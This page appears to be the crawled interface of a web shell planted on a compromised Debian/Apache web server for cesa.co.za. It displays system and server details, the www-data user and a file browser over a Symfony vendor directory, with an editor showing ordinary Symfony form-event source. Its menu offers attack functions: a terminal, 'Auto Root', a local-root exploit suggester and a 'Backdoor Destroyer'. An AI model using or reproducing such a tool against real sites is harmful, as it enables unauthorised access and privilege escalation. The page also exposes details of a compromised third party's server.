Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
form /
Event /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
PostSetDataEvent.php
1.02
KB
-rwxrwxr-x
2026-03-13 14:59
PostSubmitEvent.php
1.03
KB
-rwxrwxr-x
2026-03-13 14:59
PreSetDataEvent.php
521
B
-rwxrwxr-x
2026-03-13 14:59
PreSubmitEvent.php
624
B
-rwxrwxr-x
2026-03-13 14:59
SubmitEvent.php
589
B
-rwxrwxr-x
2026-03-13 14:59
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Form\Event; use Symfony\Component\Form\FormEvent; /** * This event is dispatched after the Form::submit() * once the model and view data have been denormalized. * * It can be used to fetch data after denormalization. */ final class PostSubmitEvent extends FormEvent { /** * @deprecated since Symfony 6.4, it will throw an exception in 7.0. */ public function setData(mixed $data): void { trigger_deprecation('symfony/form', '6.4', 'Calling "%s()" will throw an exception as of 7.0, listen to "form.pre_submit" or "form.submit" instead.', __METHOD__); // throw new BadMethodCallException('Form data cannot be changed during "form.post_submit", you should use "form.pre_submit" or "form.submit" instead.'); parent::setData($data); } }